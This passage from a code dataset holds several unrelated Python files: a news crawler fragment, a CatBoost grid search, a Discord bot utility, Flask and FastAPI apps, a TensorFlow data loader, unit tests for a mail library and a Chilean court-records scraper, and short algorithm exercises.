})\n\n except newspaper.ArticleException as e:\n if PY_ENV == 'development':\n print('\\n(ARTICLE ERROR) Article Skipped\\n')\n slp_time = insert_log(source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,  # was the undefined name 'url', which raised NameError inside this handler\n 'crawlerName': 'credible crawler'\n })\n continue\n\n insert_log(source_id, 'sourceCrawl', 'success',\n float(time.clock() - src_start_time), {\n 'articlesCrawledCount': src_art_count,\n 'crawlerName': 'credible crawler'\n })\n\n if PY_ENV == 'development':\n print('\\n' + source.domain + ' done!')\n sleep(randrange(2, 6))\n","sub_path":"crawler/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":20508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"482191881","text":"import pandas as pd\nimport numpy as np\nfrom catboost import CatBoostClassifier\nfrom sklearn.model_selection import GridSearchCV, StratifiedKFold\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import log_loss, accuracy_score\nfrom collections import defaultdict\nfrom tqdm import tqdm\nimport seaborn as sns\nimport math\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nfrom multiprocessing import Pool\n\nimport matplotlib.pyplot as plt\n\npca = PCA()\n\ntext_file=open('training.txt','w')\n\nMAX_DEPTH = [6, 8, 10]\nLEARNING_RATE = [0.01, 
0.005]\nITERATIONS = [1500, 1750, 2000, 2250]\nL2_NORM = [0, 15, 30]\nL1 = len(MAX_DEPTH)\nL2 = len(LEARNING_RATE)\nL3 = len(ITERATIONS)\nL4 = len(L2_NORM)\n\n# read in data\ntraining = pd.read_csv('first_round_training_data.csv')\ntesting = pd.read_csv('first_round_testing_data.csv')\nfeatures = [\"Parameter5\",\"Parameter6\",\"Parameter7\",\"Parameter8\",\"Parameter9\",\"Parameter10\"]\n\ntraining[features] = np.log(training[features].values)/np.log(10)\ntesting[features] = np.log(testing[features].values)/np.log(10)\n\ncode = {'Pass':1, 'Good':2, 'Excellent':3, 'Fail':0}\ntraining['new_Quality'] = training['Quality_label'].apply(lambda x : code[x])\n\nN = 10\n\nskf = StratifiedKFold(n_splits=N, shuffle=True, random_state=302)\nindices = []\nfor train_index, test_index in skf.split(training[features], training[['new_Quality']]):\n indices.append([train_index, test_index])\n\ndef target_mean_encoding_fit(variables, targets):\n '''\n This function returns the codebook to target mean encoding of the input categorical variable\n Input variable can be integers, strings or values, targets are the labels, which should be float numbers\n \n It returns the codebook from variable values to its encoding\n '''\n df = pd.DataFrame({'variable': variables, 'targets':targets})\n codebook = defaultdict(lambda : np.mean(targets))\n df = df.groupby(['variable'], as_index=False).agg('mean')\n for i in range(df.shape[0]):\n codebook[df.iloc[i, 0]] = df.iloc[i, 1]\n return codebook\n\ndef target_mean_encoding_apply(variables, codebook):\n '''\n This function returns the target mean encoding of the input categorical variable\n Input variable can be integers, strings or values, codebook is the rules to follow to get encodings.\n This codebook should be the output of traget_mean_encoding_fit()\n \n It returns the encoded values\n '''\n result = []\n all_keys = list(codebook.keys())\n for value in variables:\n if value in codebook.keys():\n result.append(codebook[value])\n else:\n index = np.argmin((np.array(all_keys) - value)**2)\n result.append(codebook[all_keys[index]])\n return result\n\ndef get_target_mean_encoding(training, validation, col_list, target_name):\n '''\n Use previous funcionts to transform the columns in col_list to their mean target encoding\n The transformation is in both training and validation set\n target_name is the name of column which is the label\n \n Return the transformed training/validation datasets\n '''\n for column in col_list:\n codebook = target_mean_encoding_fit(training[column].values, training[target_name].values)\n training.loc[:, column] = target_mean_encoding_apply(training[column], codebook)\n validation.loc[:, column] = target_mean_encoding_apply(validation[column], codebook)\n \n return training, validation\n\ndef get_all_encoding(training, validation, col_list):\n new_features = []\n for column in col_list:\n for level in ['Fail', 'Pass', 'Good', 'Excellent']:\n codebook = target_mean_encoding_fit(training[column].values, training['Quality_label'].values==level)\n new_name = '{}_{}'.format(column, level)\n new_features.append(new_name)\n training[new_name] = target_mean_encoding_apply(training[column], codebook)\n validation[new_name] = target_mean_encoding_apply(validation[column], codebook)\n return training, validation, new_features\n\ndef weight_of_evidence_fit(variables, targets, base=0.5):\n '''\n This function returns the weight of evidence (WoE) encoding for the input categorical variable\n Input variable can be integers, strings or values\n Input targets must 
be 0-1 one hot encoding\n \n It returns the codebook from values to WoE\n '''\n total_1 = np.sum(targets==1)\n total_0 = np.sum(targets==0)\n codebook = defaultdict(lambda : np.mean(targets))\n df = pd.DataFrame({'variable': variables, 'targets':targets})\n df = pd.crosstab(variables, targets)\n values = df.index.values\n for i in range(df.shape[0]):\n in_group_1 = df.iloc[i, 1]\n in_group_0 = df.iloc[i, 0]\n codebook.update({values[i] : np.log((in_group_0+base)/(in_group_1+base)) + np.log(total_1/total_0)})\n return codebook\n\ndef weight_of_evidence_apply(variables, codebook):\n result = []\n all_keys = list(codebook.keys())\n for value in variables:\n if value in codebook.keys():\n result.append(codebook[value])\n else:\n index = np.argmin((np.array(all_keys) - value)**2)\n result.append(codebook[all_keys[index]])\n return np.array(result)\n\ndef get_all_WoE(training, validation, col_list, base=0.5):\n new_features = []\n for column in col_list:\n for level in ['Fail', 'Pass', 'Good', 'Excellent']:\n codebook = weight_of_evidence_fit(training[column], training['Quality_label']==level, base)\n new_name = '{}_WoE_{}'.format(column, level)\n new_features.append(new_name)\n training[new_name] = weight_of_evidence_apply(training[column].values, codebook)\n validation[new_name] = weight_of_evidence_apply(validation[column].values, codebook)\n return training, validation, new_features\n'''\n#No encoding No PCA\ntext_file.write('No encoding no PCA\\n')\nnew_features = ['Parameter'+str(i) for i in [5, 7, 8, 9, 10]]\ntrain_all, test_all = training.copy(), testing.copy()\nnew_features = new_features\n\n#No encoding at all\ntext_file.write('No Encoding\\n')\nnew_features = ['Parameter'+str(i) for i in range(5, 11)]\ntrain_all, test_all = training.copy(), testing.copy()\nnew_values = pca.fit_transform(pd.concat([train_all[new_features], test_all[new_features]]))\ntrain_all[new_features] = new_values[:6000, :].copy()\ntest_all[new_features] = new_values[6000:, :].copy()\nnew_features = new_features[:5]\ntext_file.write('Number of features : {}\\n'.format(len(new_features)))\n'''\n#target mean encoding\ntext_file.write('All target mean encoding\\n')\ntrain_all, test_all, new_features = get_all_encoding(training, testing, features)\nnew_values = pca.fit_transform(pd.concat([train_all[new_features], test_all[new_features]]))\ntrain_all[new_features] = new_values[:6000, :].copy()\ntest_all[new_features] = new_values[6000:, :].copy()\nnew_features = new_features[:15]\ntext_file.write('Number of features : {}\\n'.format(len(new_features)))\n'''\n#WoE encoding\ntext_file.write('All WoE encoding\\n')\ntrain_all, test_all, new_features = get_all_WoE(training, testing, features)\nnew_values = pca.fit_transform(pd.concat([train_all[new_features], test_all[new_features]]))\ntrain_all[new_features] = new_values[:6000, :].copy()\ntest_all[new_features] = new_values[6000:, :].copy()\nnew_features = new_features[:14]\ntext_file.write('Number of features : {}\\n'.format(len(new_features)))\n'''\ndef i_to_tuple(i):\n n1 = math.floor(i/(L2*L3*L4))\n n2 = math.floor(i/(L3*L4)) % L2\n n3 = math.floor(i/L4) % L3\n n4 = i % L4\n return (n1, n2, n3, n4) \n\ndef my_CV(params):\n i, iterations, depth, learning_rate, l2_leaf_reg = params\n train_index = indices[i][0]\n test_index = indices[i][1]\n model = CatBoostClassifier(iterations=iterations, \n depth=depth, \n learning_rate=learning_rate, \n silent=True, \n loss_function='MultiClass', \n l2_leaf_reg=l2_leaf_reg)\n X_train = train_all.loc[train_index, new_features]\n 
y_train = train_all.loc[train_index, ['new_Quality']]\n X_test = train_all.loc[test_index, new_features]\n y_test = train_all.loc[test_index, ['new_Quality']]\n model.fit(X=X_train, y=y_train, eval_set=(X_test, y_test))\n train_probs = model.predict_proba(X_train)\n train_predictions = model.predict(X_train)\n train_accuracy = accuracy_score(y_train, train_predictions)\n train_neg_log_loss = -log_loss(y_train, train_probs)\n test_probs = model.predict_proba(X_test)\n test_neg_log_loss = -log_loss(y_test, test_probs)\n test_predictions = model.predict(X_test)\n test_accuracy = accuracy_score(y_test, test_predictions)\n return (train_accuracy, train_neg_log_loss, test_accuracy, test_neg_log_loss)\n\npool = Pool(processes = N)\nresults = np.zeros((L1*L2*L3*L4, 4))\n\nfor i in tqdm(range(L1*L2*L3*L4)):\n n1, n2, n3, n4 = i_to_tuple(i)\n iterations = ITERATIONS[n3]\n depth = MAX_DEPTH[n1]\n learning_rate = LEARNING_RATE[n2]\n l2_leaf_reg = L2_NORM[n4]\n results[i, :] = np.mean(np.array(pool.map(my_CV, [(j, iterations, depth, learning_rate, l2_leaf_reg) for j in range(N)])), axis=0)\n\nindex = np.argsort(-results[:, 3])#sort by test neg log loss, decreasing order\nn1, n2, n3, n4 = i_to_tuple(index[0])\ntext_file.write('Best configuration is : {} iterations,\\n\\t{} depth,\\n\\t{} learning rate and\\n\\t{} l2 regularization\\n'.format(ITERATIONS[n3], MAX_DEPTH[n1], LEARNING_RATE[n2], L2_NORM[n4]))\n\ntext_file.write('Top five train accuracy : {}\\n'.format(results[index[:5], 0]))\ntext_file.write('Top five train neg log loss : {}\\n'.format(results[index[:5], 1]))\ntext_file.write('Top five test accuracy : {}\\n'.format(results[index[:5], 2]))\ntext_file.write('Top five test neg log loss: {}\\n'.format(results[index[:5], 3]))\n\ntext_file.close()\nnp.save('results.npy', results)\n","sub_path":"CCF Production Quality Prediction/my_GridSearch.py","file_name":"my_GridSearch.py","file_ext":"py","file_size_in_byte":9887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"79223175","text":"#External\nimport discord\nfrom dateparser.search import search_dates\n#Python\nimport asyncio\nfrom datetime import datetime as dtime\nfrom datetime import timezone\n\n\nclass Utility:\n\n bot = None\n db_cluster = None\n embed_color = None\n\n @classmethod\n def setup(cls, bot, db_cluster, embed_color):\n cls.bot = bot\n cls.db_cluster = db_cluster\n cls.embed_color = embed_color\n\n @staticmethod\n def is_integer(s):\n # check if a string is an integer (includes negative integers)\n try: \n int(s)\n return True\n except ValueError:\n return False\n\n @staticmethod\n def date_from_txt(s):\n # needed because replace cannot be called on None\n if search_dates(s):\n return search_dates(s)[0][1].replace(tzinfo = timezone.utc)\n\n @staticmethod\n def text_to_boolean(flag):\n if flag in ['True', 'true']:\n return True\n elif flag in [ 'False', 'false']:\n return False\n \n @classmethod\n async def confirm_action(cls, res, actor):\n\n tick_emote = u\"\\u2705\"\n cross_emote = u\"\\U0001F6AB\"\n await res.add_reaction(tick_emote)\n await res.add_reaction(cross_emote)\n\n def check(reaction, user):\n reacted_emote = str(reaction.emoji)\n return reaction.message.id == res.id and user == actor and (reacted_emote == tick_emote or reacted_emote == cross_emote)\n try:\n reaction, user = await cls.bot.wait_for('reaction_add', timeout = 60.0, check=check)\n except asyncio.TimeoutError:\n # if overtime, send timeout message and return\n return False\n\n # if cancelled, send 
cancellation message and return\n if str(reaction.emoji) == cross_emote:\n return False\n\n return True\n\n @classmethod\n def get_vtuber(cls, guild_id):\n settings_db = cls.db_cluster[\"settings\"][\"general\"]\n result = settings_db.find_one({}, {'supported_idols' : { '$elemMatch': {'guild_id' : guild_id}}})\n if 'supported_idols' in result:\n return result['supported_idols'][0]['name']\n else:\n return \"not supported server\"\n\n @classmethod\n def create_supported_vtuber_embed(cls):\n settings = cls.db_cluster['settings']['general']\n array = settings.find_one({}, {'supported_idols'})['supported_idols']\n\n # list every vtuber like \"- \"\n vtuber_list = \"- \" + '\\n- '.join(element['name'] for element in array)\n title = \"Supported VTuber\"\n\n return discord.Embed(title = title, description = vtuber_list, colour = cls.embed_color)\n","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"270538883","text":"def solution(N):\n string = to_binary(N)\n result = count_binary_gap(string)\n return result\n\ndef to_binary(N):\n result = \"\"\n i = 2**32\n while N > 0:\n if N // i > 0:\n result += '1'\n N -= i\n else:\n result += '0'\n i /= 2\n\n return result\n\ndef count_binary_gap(string):\n count_zeros = 0\n remember_me = 0\n flag_one_seen = False\n print(len(string))\n for char in string:\n if char == '0' and flag_one_seen:\n count_zeros += 1\n\n elif char == '1':\n if count_zeros > remember_me:\n remember_me = count_zeros\n count_zeros = 0\n flag_one_seen = True\n return remember_me\n\n\n\n\n\n","sub_path":"t1_binary_gap/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"415576730","text":"from __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nimport os\nfrom .bbox import Box\nfrom tqdm import tqdm\nfrom .tfrecord_utils import convert_to, input_fn, es_input_fn\n\n\n\nclass Data:\n def __init__(self, classes_text=None, image_size=(800,800,3),batch_size=32, shuffle_buffer_size=4, prefetch_buffer_size=1,num_parallel_calls=4 , num_parallel_readers=1):\n if classes_text:\n with open(classes_text) as f:\n self.class_names = []\n for lines in f.readlines():\n arr = lines.strip().split(',')\n self.class_names.append(arr[-1])\n self.image_size = image_size\n self.batch_size = batch_size\n self.shuffle_buffer_size = shuffle_buffer_size\n self.prefetch_buffer_size = prefetch_buffer_size\n self.num_parallel_calls = num_parallel_calls\n self.num_parallel_readers = num_parallel_readers\n \n def get_batch(self,filenames=None,es=False):\n if es:\n return es_input_fn(self,filenames)\n return input_fn(self, filenames)\n \n \n \n\n\nclass PreProcessData:\n def __init__(self,classes_text='./dummy_labels.txt',image_size=(800,800)):\n self.images = None\n self.labels = None\n self.image_size=image_size\n with open(classes_text) as f:\n self.class_names = []\n for lines in f.readlines():\n arr = lines.strip().split(',')\n self.class_names.append(arr[0])\n\n def load_mot(self,mot_dir):\n self.images = []\n self.labels = []\n self.name = 'MOT_Training'\n pbar = tqdm(os.listdir(mot_dir))\n max_boxes = 0\n for folder in pbar:\n if '.' 
in folder:\n continue\n height = 0\n width = 0\n with open(mot_dir+folder+'/seqinfo.ini','r') as info:\n for lines in info:\n if 'imWidth' in lines:\n lines = lines.split('=')\n width = float(lines[1])\n elif 'imHeight' in lines:\n lines = lines.split('=')\n height = float(lines[1])\n else:\n continue\n assert height!=0\n assert width!=0\n with open(mot_dir+folder+'/gt/gt.txt','r') as gt:\n dict_annot = {}\n dict_annot['frame'] = {}\n for index, lines in enumerate(gt):\n splitline = [float(x.strip()) for x in lines.split(',')]\n label = int(splitline[7])-1\n x_val = splitline[2]\n y_val = splitline[3] \n box_width = splitline[4]\n box_height = splitline[5]\n\n x_center = x_val +(box_width/2.)\n y_center = y_val +(box_height/2.)\n box = Box()\n box.calculate_xyxy(x_center,y_center,box_width,box_height)\n box.label = label\n frame_id = int(splitline[0])\n if frame_id not in dict_annot['frame']:\n dict_annot['frame'][frame_id] = []\n dict_annot['frame'][frame_id].append(box)\n for frame_id in sorted(dict_annot['frame'].keys()):\n img = mot_dir+folder+'/img1/'+str(frame_id).zfill(6)+'.jpg'\n boxes = dict_annot['frame'][frame_id]\n boxes = np.array(boxes)\n self.images.append((img,height,width,3))\n if max_boxes < boxes.shape[0]:\n max_boxes = boxes.shape[0]\n self.labels.append(boxes)\n self.images = np.array(self.images)\n self.labels = np.array(self.labels)\n self.num_examples = self.images.shape[0]\n self.max_boxes = max_boxes\n\n def get_open_images(self,filedir,data_type='train'):\n import csv\n self.images = []\n self.labels = []\n self.name='OpenImages'+'-'+data_type\n self.max_boxes = 0\n self.num_examples = 0\n annotations_file = filedir+'annotations/' + '{}-bbox.csv'.format(data_type)\n with open(annotations_file,'r') as csvfile:\n bbox_reader = csv.reader(csvfile,delimiter=',')\n print(\"Open Images contains a large number of files, do not be discourage if it takes a long time.\")\n next(bbox_reader)\n dict_annot = {}\n pbar = tqdm(bbox_reader)\n pbar.set_description(\"Reading Annotations\")\n for elem in pbar:\n filename = elem[0]\n label = elem[2]\n xmin = float(elem[4])\n xmax = float(elem[5])\n ymin = float(elem[6])\n ymax = float(elem[7])\n #convert label to int\n label = self.class_names.index(label) \n box = Box(x0=xmin, y0 = ymin, x1=xmax, y1=ymax,label=label)\n if filename not in dict_annot.keys():\n dict_annot[filename] = []\n height=1\n width=1\n #need to read the image height and width every time we run into a new filename\n dict_annot[filename].append(box)\n for filename in dict_annot.keys():\n image_name = filedir+data_type+'/'+filename+'.jpg'\n boxes = np.array(dict_annot[filename])\n self.images.append((image_name,height,width))\n if self.max_boxes < boxes.shape[0]:\n self.max_boxes = boxes.shape[0]\n self.labels.append(boxes)\n self.images = np.array(self.images)\n self.labels = np.array(self.labels)\n self.num_examples = self.images.shape[0]\n \n\n\n\n def write_tf(self,directory,num_shards = 1):\n convert_to(self,directory,self.name,num_shards=num_shards)\n\n","sub_path":"old/Pipeline/data/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"93514171","text":"import unittest\nfrom mox3.mox import MoxTestBase, IgnoreArg\nfrom gevent import socket\n\nfrom slimta import util\n\n\nclass TestIPv4SocketCreator(MoxTestBase):\n\n def setUp(self):\n super(TestIPv4SocketCreator, self).setUp()\n self.mox.StubOutWithMock(socket, 'create_connection')\n 
self.mox.StubOutWithMock(socket, 'getaddrinfo')\n self.getaddrinfo = self.mox.CreateMock(socket.getaddrinfo)\n self.socket_creator = util.build_ipv4_socket_creator([25])\n\n def test_other_port(self):\n socket.create_connection(('host', 443), 'timeout', 'source').AndReturn('socket')\n self.mox.ReplayAll()\n ret = self.socket_creator(('host', 443), 'timeout', 'source')\n self.assertEqual('socket', ret)\n\n def test_successful(self):\n socket.getaddrinfo('host', 25, socket.AF_INET).AndReturn([(None, None, None, None, 'sockaddr')])\n socket.create_connection('sockaddr', IgnoreArg(), IgnoreArg()).AndReturn('socket')\n self.mox.ReplayAll()\n ret = self.socket_creator(('host', 25), 'timeout', 'source')\n self.assertEqual('socket', ret)\n\n def test_error(self):\n socket.getaddrinfo('host', 25, socket.AF_INET).AndReturn([(None, None, None, None, 'sockaddr')])\n socket.create_connection('sockaddr', IgnoreArg(), IgnoreArg()).AndRaise(socket.error('error'))\n self.mox.ReplayAll()\n with self.assertRaises(socket.error):\n self.socket_creator(('host', 25), 'timeout', 'source')\n\n def test_no_addresses(self):\n socket.getaddrinfo('host', 25, socket.AF_INET).AndReturn([])\n self.mox.ReplayAll()\n with self.assertRaises(socket.error):\n self.socket_creator(('host', 25), 'timeout', 'source')\n\n\n# vim:et:fdm=marker:sts=4:sw=4:ts=4\n","sub_path":"test/test_slimta_util.py","file_name":"test_slimta_util.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"256855952","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom datetime import datetime\nfrom flask import render_template,session,redirect,url_for,flash\n\nfrom . import main\nfrom .forms import NameForm\nfrom .. import db\nfrom ..db_config import User\nfrom .. 
import create_app\nfrom ..email_config import send_email\n\napp = create_app('default')\n@main.route('/', methods=['GET', 'POST'])\ndef index():\n form = NameForm()\n if form.validate_on_submit():\n old_name = session.get('name')\n if old_name is not None and old_name != form.name.data:\n flash('注意!你改变了你的登录名。')\n user = User.query.filter_by(username=form.name.data).first()\n if user is None:\n user = User(username=form.name.data)\n db.session.add(user)\n session['known'] = False\n ##发送邮件\n if app.config['MAIL_ADMIN']:\n send_email(app.config['MAIL_ADMIN'], '新用户登录', template=form.name.data)\n else:\n session['known'] = True\n session['name'] = form.name.data\n form.name.data = ''\n return redirect(url_for('.index'))\n return render_template('index.html', current_time=datetime.utcnow(), form=form,\n name=session.get('name'),known=session.get('known', False))\n\n@main.route('/user/')\ndef user(name):\n return render_template('user.html',current_time=datetime.utcnow(),name=name)","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"536616471","text":"import uvicorn\nfrom fastapi import FastAPI \n\nimport joblib,os\n\nmodel_file = open(\"models/model_joblib\",\"rb\")\nmodel_condo = joblib.load(model_file)\n\n#init app\napp = FastAPI()\n\n#Routes\n@app.get('/')\nasync def index():\n return {\"text\": \"Hello API Builders\"}\n\n@app.get('/items/{name}')\nasync def get_items(name):\n return {\"name\":name}\n\n@app.get('/predict/{sqft}')\nasync def predict(sqft):\n result = model_condo.predict([[sqft]])\n return result[0]\n\nif __name__ == '__main__':\n uvicorn.run(app,host=\"127.0.0.1\",port=8888)\n\n","sub_path":"machine-learning/ml_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"592006629","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10 ** 6)\n\n\ndef dfs(here):\n dp[here][0] = people[here-1]\n \n for there in tree[here]:\n if visit[there] == 0:\n visit[there] = 1\n dfs(there)\n\n dp[here][0] += dp[there][1]\n dp[here][1] += max(dp[there][0], dp[there][1])\n \n\nn = int(input())\npeople = list(map(int, input().split()))\ntree = [[] for x in range(n+1)]\n\n#dp[x][y] x번째가 0 -> 포함, 1 -> X 일때 최대값\ndp = [[0, 0] for x in range(n+1)]\n\nvisit = [0 for x in range(n+1)]\n\nfor x in range(n-1):\n a, b = map(int, input().split())\n tree[a].append(b)\n tree[b].append(a)\n\nvisit[1] = 1\ndfs(1)\n\nprint(max(dp[1][0], dp[1][1]))\n","sub_path":"Hangil/day10_1949_choi.py","file_name":"day10_1949_choi.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"604432614","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = \"lysdexia@gmail.com\"\n__version__ = \"dev\"\n\nimport json, os\nimport cherrypy\n\nfrom ScooterPhage import Define\n\nclass Index(object):\n @cherrypy.expose\n def default(self, **kwargs):\n return json.dumps(kwargs)\n\n\"\"\"\nClassify parts by type on bike: Mechanical, Body, FrameSuspension ...\nUsed to build language-specific part lists.\n\"\"\"\nclass Classify(object):\n Body = Define.Body()\n Mechanical = Define.Mechanical()\n FrameSuspension = Define.FrameSuspension()\n Language = Define.Language()\n\nif __name__ == \"__main__\":\n # global configuration file \n\n pth = 
os.path.dirname(os.path.abspath(__file__))\n conf = os.path.join(pth, \"Config/Kphretiq.conf\")\n cherrypy.config.update(conf)\n\n classify_conf = os.path.join(pth, \"Config/Classify.conf\")\n cherrypy.config.update(classify_conf)\n\n cherrypy.tree.mount(Index(), \"/\", conf)\n cherrypy.tree.mount(Classify(), \"/Classify\", classify_conf)\n\n cherrypy.engine.start()\n cherrypy.engine.block()\n","sub_path":"ScooterPhage.py","file_name":"ScooterPhage.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"245942292","text":"from app.civil import civil\nfrom app.laboral import laboral\nfrom app.tribunal import tribunal\nimport unittest\n\n\nclass Test(unittest.TestCase):\n\n def setUp(self):\n self.c = civil()\n self.l = laboral()\n self.t = tribunal()\n\n def tearDown(self):\n pass\n\n def TestTribunalesCivil(self):\n res = self.t.obtenerTribunalesCivil()\n hash_tribunales = res['TRIBUNALES'][1]['HASH']\n self.assertEquals(hash_tribunales, 'e66177e36f92a95b6ba90553a0338701')\n\n def TestTribunalesLaboral(self):\n res = self.t.obtenerTribunalesLaboral()\n hash_tribunales = res['TRIBUNALES'][1]['HASH']\n self.assertEquals(hash_tribunales, '9a58d1f9885c5dae05ae05185a1a8bb1')\n\n def TestCivilPorRit(self):\n cod_tribunal = '130'\n rit_causa = 'C-25-2015'\n res = self.c.porRit(cod_tribunal, rit_causa)\n hash_causa = res['CAUSA'][2]['HASH']\n caratula = self.c.dict_caratula['CARATULA'][0]['CARATULA']\n documentos = self.c.dict_documentos['DOCUMENTOS'][0]['DOCUMENTO']\n\n self.assertEquals(hash_causa, '08fde98c4d3460482e8ffc2989e45ee7')\n self.assertEquals(caratula, 'SCOTIABANK CHILE / CHAMORR')\n self.assertEquals(documentos, 'http://civil.poderjudicial.cl/CIVILPORWEB/DownloadFile.do?TIP_Documento=3&TIP_Archivo=3&COD_Opcion=1&COD_Tribunal=130&CRR_IdTramite=61570757&CRR_IdDocumento=54519474')\n\n def TestCivilPorRut(self):\n cod_tribunal = '110'\n rut_causa = '76075466-8'\n res = self.c.porRut(cod_tribunal, rut_causa)\n hash_causa = res['CAUSA'][2]['HASH']\n caratula = self.c.dict_caratula['CARATULA'][0]['CARATULA']\n documentos = self.c.dict_documentos['DOCUMENTOS'][0]['DOCUMENTO']\n\n self.assertEquals(hash_causa, '1053f41e1eb905ad529d1bc2376024f3')\n self.assertEquals(caratula, 'FONDO DE INVERSION PRIVADO')\n self.assertEquals(documentos, 'No incluye documento')\n\n def TestLaboralPorRit(self):\n cod_tribunal = '1351'\n rit_causa = 'T-69-2014'\n res = self.l.porRit(cod_tribunal, rit_causa)\n hash_causa = res['CAUSA'][2]['HASH']\n caratula = self.l.dict_caratula['CARATULA'][0]['CARATULA']\n documentos = self.l.dict_documentos['DOCUMENTOS'][0]['DOCUMENTO']\n\n self.assertEquals(hash_causa, 'f46e75523508e7699ef8559ebcc1e777')\n self.assertEquals(caratula, 'REYES CON DESARROLLO TERRE')\n self.assertEquals(documentos, 'http://laboral.poderjudicial.cl/SITLAPORWEB/DownloadFile.do?TIP_Documento=3&TIP_Archivo=1&COD_Opcion=1&COD_Tribunal=1351&CRR_IdCausa=325115&CRR_IdTramite=3960625&CRR_IdDocumento=4014653')\n\n def TestLaboralPorRuc(self):\n cod_tribunal = '1351'\n rit_causa = '14-4-0039155-7'\n res = self.l.porRuc(cod_tribunal, rit_causa)\n hash_causa = res['CAUSA'][2]['HASH']\n caratula = self.l.dict_caratula['CARATULA'][0]['CARATULA']\n documentos = self.l.dict_documentos['DOCUMENTOS'][0]['DOCUMENTO']\n self.assertEquals(hash_causa, 'f46e75523508e7699ef8559ebcc1e777')\n self.assertEquals(caratula, 'REYES CON DESARROLLO TERRE')\n self.assertEquals(documentos, 
'http://laboral.poderjudicial.cl/SITLAPORWEB/DownloadFile.do?TIP_Documento=3&TIP_Archivo=1&COD_Opcion=1&COD_Tribunal=1351&CRR_IdCausa=325115&CRR_IdTramite=3960625&CRR_IdDocumento=4014653')\n\n def TestLaboralPorRut(self):\n cod_tribunal = '1351'\n rut_causa = '76167945-7'\n res = self.l.porRut(cod_tribunal, rut_causa)\n hash_causa = res['CAUSA'][2]['HASH']\n caratula = self.l.dict_caratula['CARATULA'][0]['CARATULA']\n documentos = self.l.dict_documentos['DOCUMENTOS'][0]['DOCUMENTO']\n\n self.assertEquals(hash_causa, '9c7252bf65d7880315cc6a67642490a4')\n self.assertEquals(caratula, 'IGB MONTAJES EIRL CON INSP')\n self.assertEquals(documentos, 'http://laboral.poderjudicial.cl/SITLAPORWEB/DownloadFile.do?TIP_Documento=3&TIP_Archivo=1&COD_Opcion=1&COD_Tribunal=1351&CRR_IdCausa=386225&CRR_IdTramite=4010675&CRR_IdDocumento=4064563')\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/testScraperPJUD.py","file_name":"testScraperPJUD.py","file_ext":"py","file_size_in_byte":4097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"624356722","text":"import os\nimport json\nimport unittest\nimport datetime\nimport jwt\nfrom test.v2.basetest import BaseTestCase\nfrom app import create_app\n\n\nclass TestParties(BaseTestCase):\n def setUp(self):\n super().setUp()\n\n self.parties_data2 = {\n \"name\": \"jubilee\",\n \"hqaddress\": \"Nairobi\",\n \"logourl\": \"photo.com\"\n }\n\n def test_create_party(self):\n response = self.create_party(self.parties_data)\n\n self.assertEqual(response.status_code, 201)\n\n def test_create_party_with_short_name(self):\n \"\"\" test for creating an party with a short name\"\"\"\n office = {\n \"name\": \"off\",\n \"hqaddress\": \"Nairobi\",\n \"logourl\": \"logourl\"\n }\n response = self.create_office(office)\n self.assertEqual(response.status_code, 400)\n\n def test_create_party_with_numbers(self):\n \"\"\" test for creating an party that contains a number\"\"\"\n office = {\n \"name\": \"party123\",\n \"hqaddress\": \"Nairobi\",\n \"logourl\": \"logourl\"\n }\n response = self.create_office(office)\n self.assertEqual(response.status_code, 400)\n\n def test_create_existing_party(self):\n \"\"\" test for creating an existing office\"\"\"\n self.create_party(self.parties_data)\n response = self.create_party(self.parties_data)\n self.assertEqual(response.status_code, 400)\n\n # def test_get_specific_party(self):\n # party = self.create_party(self.parties_data)\n # party_id = party.json[0][1]['party_id']\n # print(party_id)\n # response = self.get(\"api/v2/parties/{}\".format(party_id))\n # self.assertEqual(response.status_code, 200)\n\n def test_get_all_parties(self):\n self.create_party(self.parties_data)\n self.create_party(self.parties_data2)\n response = self.get(\"api/v2/parties\")\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json['parties']), 2)\n","sub_path":"test/v2/test_parties.py","file_name":"test_parties.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300965042","text":"import cv2\n\nimport numpy as np\nimport math\n\ndef cropBorders(img,tol=0): #https://codereview.stackexchange.com/questions/132914/crop-black-border-of-image-using-numpy answer by Divakar\n mask=img>0\n return img[np.ix_(mask.any(1),mask.any(0))]\n\nI=cv2.imread(\"LicensePlate.png\",0) #read image\ncv2.imshow(\"License Plate Original\", I)\n\nheight,width=I.shape[:2]\n\nM= 
